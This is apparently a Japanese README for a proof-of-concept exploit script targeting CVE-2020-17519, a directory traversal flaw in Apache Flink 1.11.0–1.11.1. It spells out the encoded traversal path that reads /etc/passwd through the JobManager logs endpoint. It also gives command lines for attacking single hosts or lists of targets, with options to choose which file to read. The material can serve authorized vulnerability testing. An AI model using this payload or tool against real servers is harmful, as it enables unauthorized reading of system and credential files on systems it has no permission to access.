
CVE-2020-17519の概念実証エクスプロイト。Apache Flinkのローカルファイルインクルージョンの脆弱性で、不正なファイル読み取りアクセスを可能にします。
Apache Flink 1.11.0 および 1.11.1 におけるディレクトリトラバーサル脆弱性のエクスプロイトスクリプト(CVE-2020-17519)
この脆弱性により、攻撃者は /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd のようなパスを介して、Apache Flink の JobManager で任意のファイルを読むことができます。
python3 CVE-2020-17519.py -u http://target.com
または、テキストファイルから複数のターゲットに対して実行します。
python3 CVE-2020-17519.py -f urls.txt
| オプション | 説明 |
|---|
-u | 単一ターゲットの URL(例: http://target.com) |
-f | 複数のターゲット URL を含むファイル |
-p | 読み取るファイルのパス(デフォルト: /etc/passwd) |
-o | 出力ファイル名(デフォルト: result.txt) |
python3 CVE-2020-17519.py -u http://target.com -p /etc/passwd
python3 CVE-2020-17519.py -f urls.txt -p /etc/passwd -o output.txt